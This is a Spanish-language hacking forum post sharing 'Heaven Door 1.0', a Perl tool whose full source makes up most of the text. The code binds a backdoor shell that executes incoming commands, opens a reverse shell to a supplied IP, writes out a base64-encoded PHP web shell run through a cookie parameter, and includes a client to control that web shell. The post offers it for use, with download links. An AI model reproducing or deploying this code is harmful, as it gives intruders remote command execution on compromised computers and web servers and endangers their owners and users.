[Perl] Heaven Door 1.0

Iniciado por BigBear, Enero 20, 2017, 09:14:38 AM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Enero 20, 2017, 09:14:38 AM
Un script en Perl que funciona como backdoor con las siguientes opciones :

  • Backdoor
  • Reverse Shell
  • Generar backdoor PHP
  • Conectar con backdoor PHP

    El codigo :

    Código: perl

    # !usr/bin/perl
    # Heaven Door 1.0
    # (C) Doddy Hackman 2016

    use LWP::UserAgent;
    use MIME::Base64;
    use IO::Socket;
    use IO::Socket::SSL;
    use Cwd;
    use Getopt::Long;
    use Color::Output;
    Color::Output::Init;

    GetOptions(
    	"backdoor"   => \$backdoor,
    	"reverse"   => \$reverse,
    	"ip=s"   => \$ip,
        "port=s"   => \$port,
        "generate_backdoor"  => \$generate_backdoor,
        "filename=s"  => \$filename,
        "connect_backdoor"   => \$connect_backdoor,
        "url=s"   => \$url
    );

    head();

    if ($backdoor) {
    	if($backdoor && $port) {
    		backdoor($port);
    	} else {
    		sintax();
    	}	
    }
    elsif ($reverse) {
    	if($reverse && $ip && $port) {
    		reverse_shell($ip,$port);
    	} else {
    		sintax();
    	}
    }
    elsif ($generate_backdoor) {
    	if($filename) {
    		cargar_generador_backdoor($filename);
    	} else {
    		sintax();
    	}
    }
    elsif ($connect_backdoor) {
    	if($url) {
    		cargar_consola_backdoor($url);
    	} else {
    		sintax();
    	}
    }
    else {
        sintax();
    }

    copyright();

    # Functions

    # Simple backdoor

    sub backdoor {
    	
    	my($port) = @_;
    	
    	$backdoor = IO::Socket::INET->new(Proto=> 'tcp',LocalPort =>$port,Listen=> SOMAXC,Reuse=> 1);

    	printear("[+] Heaven_Door : ");
    	print "Online\n";
    	printear("[+] Port : ");
    	print "$port\n";
    	printear("[+] PID : ");
    	print "$$\n\n";
    	
    	printear_titulo("[+] Connected");

    	while ($jesus = $backdoor->accept()) {
    		$jesus->autoflush(1);
    		print $jesus "[+] Heaven_Door : Online\n[+] Port : 25256\n[+] PID : ".$$."\n\n";
    		print $jesus "Welcome  ".$jesus->peerhost."\n\n";
    		&extras;
    		$dir = getcwd();
    		print $jesus $dir.">>";
    		while (<$jesus>) {
    			my $yeah = qx($_);
    			print $jesus "\n\n".$yeah."\n\n";
    			print $jesus $dir.">>";
    		}
    	}

    	sub extras {

    		if ($^O =~/Win32/ig) {
    			use if $^O eq "MSWin32", "Win32";
    			print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
    			print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
    			print $jesus "[+] Username : ".Win32::LoginName()."\n\n";
    		} else {
    			$output =  `uname -a`;
    			print $jesus "--==System Info==--\n\n".$output."\n";
    		}
    	}
    	
    } 

    #

    # Reverse Shell

    sub reverse_shell {
    	my($ip,$port) = @_;
    	printear_titulo("[+] Reverse Shell : ");
    	print "Loaded\n\n";
    	printear("[+] IP to connect : ");
    	print $ip."\n";
    	printear("[+] Port : ");
    	print $port."\n\n";
    	printear_logo("[+] Connecting ...\n\n");
    	socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
    	connect(REVERSE, sockaddr_in($port,inet_aton($ip)));
    	printear_titulo("[+] Reverse Shell successful\n\n");
    	open (STDIN,">&REVERSE");
    	open (STDOUT,">&REVERSE");
    	open (STDERR,">&REVERSE");
    	tipo();
    	printear_logo("[+] Disconnecting ...\n\n");
    }

    sub tipo {
    	if ($^O =~/Win32/ig) {
    		infowin();
    	system("cmd.exe");
    	} else {
    		infolinux();
    		system("export TERM=xterm;exec sh -i");
    	}
    }

    sub infowin {
    	use if $^O eq "MSWin32", "Win32";
    	print "[+] Domain Name : ".Win32::DomainName()."\n";
    	print "[+] OS Version : ".Win32::GetOSName()."\n";
    	print "[+] Username : ".Win32::LoginName()."\n\n";
    }

    sub infolinux {
    	print "[+] System information\n\n";
    	system("uname -a");
    	print "\n";
    }

    #

    # More Functions

    sub cargar_consola_backdoor {
    	printear("[+] Checking Backdoor ...\n\n");
    	my $check1 = cargar_comando($url,"ver");
    	my $check2 = cargar_comando($url,"uname -a");
    	if(check_backdoor($check1) or check_backdoor($check2)) {
    		printear_logo("[+] Backdoor Loaded\n");
    		my($url) = @_;
    		while(1) {
    			printear("\n[+] Command : ");
    			chomp( my $comando = <stdin> );
    			if ( $comando =~ /exit/ ) {
    				copyright();
    			}
    			my $code = cargar_comando($url,$comando);
    			if(check_backdoor($code)) {
    				my $output = extract_command_backdoor($code);
    				if($output ne "") {
    					printear_titulo("\n".$output."\n");
    				} else {
    					printear_titulo("\n"."[-] Invalid command"."\n");	
    				}
    			} else {
    				printear_titulo("\n"."[-] Invalid command"."\n");
    			}
    		}
    	} else {
    		printear_logo("[+] Backdoor not exists\n");
    	}
    }

    sub check_backdoor {
    	my $text = shift;
    	if($text=~/\[code\_heaven\](.*?)\[\/code\_heaven\]/s) {
    		return 1;
    	} else {
    		return 0;
    	}
    }

    sub extract_command_backdoor {
    	my $text = shift;
    	if($text=~/\[code\_heaven\](.*?)\[\/code\_heaven\]/s) {
    		return $1;
    	} else {
    		return "";
    	}
    }

    sub cargar_generador_backdoor {
    	my $filename = shift;
    	if(-f $filename) {
    		unlink($filename);
    	}
    	printear_titulo("[+] Generating backdoor ...\n\n");
    	generar_backdoor($filename);
    	if(-f $filename) {
    		printear("[+] Backdoor $filename generated !\n");
    	} else {
    		printear("[-] Error generating backdoor\n");
    	}
    }

    sub generar_backdoor {
    	my $filename = shift;
    	my $code = "PD9waHAgaWYgKGlzc2V0KCRfQ09PS0lFWyJoZWF2ZW5fZG9vcl9oZXJlIl0pICYmICFlbXB0eSgkX0NPT0tJRVsiaGVhdmVuX2Rvb3JfaGVyZSJdKSkgeyAJJGNvZGUgPSAiIjsgCSRvdXRwdXQgPSAiIjsgCWV4ZWMoJF9DT09LSUVbImhlYXZlbl9kb29yX2hlcmUiXSwkY29kZSk7IAlmb3JlYWNoICgkY29kZSBhcyAkbGluZSkgeyAJCSRvdXRwdXQgPSAkb3V0cHV0IC4gJGxpbmUuIlxuIjsgCX0gCWVjaG8gYmFzZTY0X2VuY29kZSgiW2NvZGVfaGVhdmVuXSIuJG91dHB1dC4iWy9jb2RlX2hlYXZlbl0iKTsgfSA";
    	savefile($filename,decode_base64($code));
    }

    sub cargar_comando {
    	my($url,$command) = @_;
    	my $nave = LWP::UserAgent->new(ssl_opts => {verify_hostname => 0,SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE});
    	$nave->agent("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
    	$nave->timeout(10);
    	my $contenido = $nave->get($url,Cookie => "heaven_door_here=".$command)->content;
    	return decode_base64($contenido);
    }

    sub savefile {
    	my ($filename,$text) = @_;
    	open( SAVE, ">>" . $filename );
    	print SAVE $text . "\n";
    	close SAVE;
    }

    sub printear {
        cprint( "\x036" . $_[0] . "\x030" );
    }

    sub printear_logo {
        cprint( "\x037" . $_[0] . "\x030" );
    }

    sub printear_titulo {
        cprint( "\x0310" . $_[0] . "\x030" );
    }

    sub sintax {

        printear("[+] Sintax : ");
        print "perl $0 <option> <value>\n";
        printear("\n[+] Options : \n\n");
        print "-backdoor -port <port> : Enable backdoor in port\n";
        print "-reverse -ip <ip> -port <port> : Get all tags GPS of a image\n";
        print "-generate_backdoor -filename <filename> : Generate backdoor in filename\n";
        print "-connect_backdoor -url <url> : Connect to backdoor in URL\n";
        printear("\n[+] Example : ");
        print "perl heaven_door.pl -reverse -ip 127.0.0.1 -port 666\n";
        copyright();
    }

    sub head {
        printear_logo("\n-- == Heaven Door 1.0 == --\n\n\n");
    }

    sub copyright {
        printear_logo("\n\n-- == (C) Doddy Hackman 2016 == --\n\n");
        exit(1);
    }

    #The End ?


    Un video con ejemplos de uso :



    Si quieren bajar el programa lo pueden hacer de aca :

    You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
    You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

    Eso seria todo.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario